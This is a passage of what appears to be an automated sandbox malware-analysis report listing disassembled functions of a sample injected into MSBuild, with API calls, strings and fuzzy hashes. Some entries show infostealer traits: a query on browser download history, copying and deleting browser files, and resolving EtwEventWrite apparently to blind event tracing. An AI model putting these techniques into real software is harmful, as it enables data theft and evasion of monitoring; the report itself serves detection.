_memset.LIBCMT ref: 00408307
LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0040833C

Strings

ERROR_RUN_EXTRACTOR, xrefs: 004082BE
v20, xrefs: 00408286
v10, xrefs: 004082CE

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 52611349-380572819
Opcode ID: c583a5af4eabbf2f1e55903ac08c2fc38dd49fb6c7cace8cd31f54493459c540
Instruction ID: 4271a2f96582835c92d1499e44d2f9be6f2f81c30510370fac18fcb9411d570f
Opcode Fuzzy Hash: c583a5af4eabbf2f1e55903ac08c2fc38dd49fb6c7cace8cd31f54493459c540
Instruction Fuzzy Hash: 5541B3B2A00108ABCF10DFA5CD42ADE7BB8AB84714F15413BFD40F7280EB78D9458B99

Function 0041C0D9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,74DE83C0,00000000,?,?,?,?,?,?,0041C6A2,?,00417037,?), ref: 0041C12C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C6A2,?,00417037), ref: 0041C15C
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C6A2,?,00417037,?), ref: 0041C188
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C6A2,?,00417037,?), ref: 0041C196

Part of subcall function 0041BAA4: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,014124A0), ref: 0041BAD8

Strings

7pA, xrefs: 0041C0E9

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID: 7pA
API String ID: 3986731826-4034994935
Opcode ID: 67e2672ab753ca4f37cc9b7268c95e0e1104df219937840ae09d8f1390f1a5d2
Instruction ID: a03e18f876bb7c6bb95fa29af4f0117ab82ea060c0d505197b56aaa6882e86ab
Opcode Fuzzy Hash: 67e2672ab753ca4f37cc9b7268c95e0e1104df219937840ae09d8f1390f1a5d2
Instruction Fuzzy Hash: 97415971900209EBCF15DF69CC80ADEBBF8FF48310F10426AE854EA266D7349985CFA4

Function 0040F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7

Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0

std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
_memmove.LIBCMT ref: 0040F320

Strings

string too long, xrefs: 0040F2E1
invalid string position, xrefs: 0040F2C2

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 585f722b960d61c8edb6e887eede1a8e5c7a6d662bb162e141d0d5ca5504c1c1
Instruction ID: 8d1b4f359d452bc0139d647030d3afcb4c777ebb34d0dc45517a8c2f57a5c6cf
Opcode Fuzzy Hash: 585f722b960d61c8edb6e887eede1a8e5c7a6d662bb162e141d0d5ca5504c1c1
Instruction Fuzzy Hash: 4C11E071300202AFCB24EF2DD981A59B3A5BF41324754053AF805EBAC2C778ED598799

Function 004092A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 004094AB
lstrlenA.KERNEL32(?), ref: 004094C6

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Strings

SELECT target_path, tab_url from downloads, xrefs: 004093B9
Downloads, xrefs: 004092D1
Downloads, xrefs: 00409328

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: d0f7768f232a6fea81bb31f6e52023b3460b0561fbafc780798fbd3c5f61104f
Instruction ID: 0396c6ceee9e83395f4e3e89a2b70f5b696ce729a6e58c91481c5bf3bd851482
Opcode Fuzzy Hash: d0f7768f232a6fea81bb31f6e52023b3460b0561fbafc780798fbd3c5f61104f
Instruction Fuzzy Hash: 75711F71A40119AFCF01FFA6DE469DDB775AF04309F611026F500B71E1DBB8AE898B98

Function 00425833 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00425841
_free.LIBCMT ref: 00425854

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: 641b289af0baeaab8b9a5171f60c0491d104b74c17f1ced00544f24bd9ae676e
Instruction ID: 935c43270f4d77db60209791427c9bc320832430a8ecb60128fe957c4bbf0321
Opcode Fuzzy Hash: 641b289af0baeaab8b9a5171f60c0491d104b74c17f1ced00544f24bd9ae676e
Instruction Fuzzy Hash: 1511EB32B04A35ABCF217F36BC0475A37A4AF403A5F60443BF948DB251DA7CC99186AC

Function 00426839 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00426845

Part of subcall function 00424A74: __getptd_noexit.LIBCMT ref: 00424A77
Part of subcall function 00424A74: __amsg_exit.LIBCMT ref: 00424A84

__getptd.LIBCMT ref: 0042685C
__amsg_exit.LIBCMT ref: 0042686A
__lock.LIBCMT ref: 0042687A
__updatetlocinfoEx_nolock.LIBCMT ref: 0042688E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction ID: 17361057c0d52ffbfdd5451dd0703f081e16a6d4bb330f32ad13174130427518
Opcode Fuzzy Hash: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction Fuzzy Hash: E7F09676F417309AD621BB7A7403B5E76A0AF00769F92425FF4106A2D2CF6C9980CA5D

Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041009A

Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED2D
Part of subcall function 0042ED18: __CxxThrowException@8.LIBCMT ref: 0042ED42
Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED53

__EH_prolog3_catch.LIBCMT ref: 00410139
std::_Xinvalid_argument.LIBCPMT ref: 0041014D

Strings

vector<T> too long, xrefs: 00410095, 00410148

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: 1419926136d60580067ac53f468ac34c9755c723ec9afb86ab4f57807058201c
Instruction ID: 755d422b0406570ec1b1ca0bb8a9fc170e0e76cf90744f0537cefae681ccfb55
Opcode Fuzzy Hash: 1419926136d60580067ac53f468ac34c9755c723ec9afb86ab4f57807058201c
Instruction Fuzzy Hash: 6331B632B503269BDB18EF69AC456EE77E29705311F51106FE520E7290D6BE9EC08B88

Function 004134D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004134F7
StrCmpCA.SHLWAPI(00000000,004367EC,?), ref: 00413523
strtok_s.MSVCRT ref: 00413589

Strings

yA, xrefs: 004134E9, 004134EC

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: yA
API String ID: 3330995566-454502181
Opcode ID: 0a5a2c7c2122c5fde08efb15dbd5b8a7581154b05120f6610f4b5857c0dd4555
Instruction ID: e25e2a4fac4fdaa3031c2764c7a521eb05de7460a47cf09186ea45e794858a97
Opcode Fuzzy Hash: 0a5a2c7c2122c5fde08efb15dbd5b8a7581154b05120f6610f4b5857c0dd4555
Instruction Fuzzy Hash: D6219571D00109BFCB18DF64C881ADABBADFF18705F11905BE809EB251E774DB858B98

Function 00413390 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004133AF
StrCmpCA.SHLWAPI(00000000,004367E0,?), ref: 004133E8

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 00410581

strtok_s.MSVCRT ref: 00413424

Strings

2yA, xrefs: 004133A1, 004133A4

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID: 2yA
API String ID: 348468850-663247701
Opcode ID: ab0f24262003b4c6fdb1df3be14b33564e9d911830fd1b95aa49f2419afa3619
Instruction ID: 530b5b9384520956d988ef5f9eef14088f7e00acaaf5feba0a58aa85cdec459f
Opcode Fuzzy Hash: ab0f24262003b4c6fdb1df3be14b33564e9d911830fd1b95aa49f2419afa3619
Instruction Fuzzy Hash: 74118171900115AFDB01DF54C945BDAB7BCBF1430AF119067E805EB192EB78EF988B98

Function 0040F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F282

Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED2D
Part of subcall function 0042ED18: __CxxThrowException@8.LIBCMT ref: 0042ED42
Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED53

std::_Xinvalid_argument.LIBCPMT ref: 0040F28D

Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0

Strings

string too long, xrefs: 0040F27D
invalid string position, xrefs: 0040F288

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: be79a2a7e9aaca69112733cb54712ed9ea9badf19c2d7797a33f7b9a263133be
Instruction ID: 277dc4e046663c8ecaa9b12b995e3b45fe52676ed53db3f7bdcff30859ae9fca
Opcode Fuzzy Hash: be79a2a7e9aaca69112733cb54712ed9ea9badf19c2d7797a33f7b9a263133be
Instruction Fuzzy Hash: 31D0C2B565020CBBCB04E7AAE8069CDB6E89F48700F20016BE700E3241EA7456004559

Function 004013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
ReleaseDC.USER32(00000000,00000000), ref: 00401416

Strings

DISPLAY, xrefs: 004013FD

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: 6d8e34817c800d656530c1e8e523df0c20ac1b926281776ce52baa48a7045e34
Instruction ID: 36e3823ee53bced430e70f0d048e6716cdaf6b37fc8da0c0fd181c1dc0393a61
Opcode Fuzzy Hash: 6d8e34817c800d656530c1e8e523df0c20ac1b926281776ce52baa48a7045e34
Instruction Fuzzy Hash: A5D012353C030477E1781B54BC5FF1A3934D7C9F02F201164F311680E046E41402973E

Function 004018B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004018BA
GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 004018CB

Strings

ntdll.dll, xrefs: 004018B5
EtwEventWrite, xrefs: 004018C5

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: EtwEventWrite$ntdll.dll
API String ID: 1646373207-1851843765
Opcode ID: 5e51bf90e60cb14d8bd058217a4af9c92f753a1577894b23d64cda725500b0c0
Instruction ID: b010eca93dcea5ac8893ac9cbd630a9a56b58122e1a4efb0db09dbf7787f5420
Opcode Fuzzy Hash: 5e51bf90e60cb14d8bd058217a4af9c92f753a1577894b23d64cda725500b0c0
Instruction Fuzzy Hash: F9B09260B803019BDE186B716F9DB8636786B64B067987262A18AD01B0D7BC8024961E

Function 0040B021 Relevance: 6.2, APIs: 4, Instructions: 222filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001), ref: 0040B0C6
lstrlenA.KERNEL32(?), ref: 0040B27C
lstrlenA.KERNEL32(?), ref: 0040B297
DeleteFileA.KERNEL32(?), ref: 0040B2E9

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
